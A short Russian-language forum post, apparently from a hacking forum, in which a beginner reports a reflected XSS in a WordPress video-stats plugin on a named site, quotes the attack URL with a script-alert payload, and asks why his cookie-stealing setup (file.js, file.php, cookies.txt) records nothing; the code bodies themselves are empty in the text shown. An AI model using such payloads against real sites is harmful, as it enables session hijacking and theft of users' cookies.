27.01.2012, 16:37
|
|
Новичок
Регистрация: 26.01.2012
Сообщений: 4
Провел на форуме:
1102
Репутация:
0
|
|
Вообщем потихоньку начал вникать в ХСС и столкнулся с такой проблемой.
http://www.gamechangers.com/index.html/wp-content/plugins/simple-flash-video/stats/?action=regenerate&query=&date=201109%22%3E%3CSCRI PT%3Ealert%28/xss/.source%29%3C/SCRIPT%3E
Перейдя по ссылки видим всплывающий алерт с надписью ХСС.
Делаю вывод что ХСС активная уязвимость присутствует.
Далее заливаю к себе на хостинг следующие файлы:
file.js :
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]document[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]write[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
file.php :
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
И вставляю в уезвимое место следующий код:
В результате в файл куки.тхт ничего не записывается. Права на запись на хостинге поставил ..
Подскажите где ошибка ? |
|
|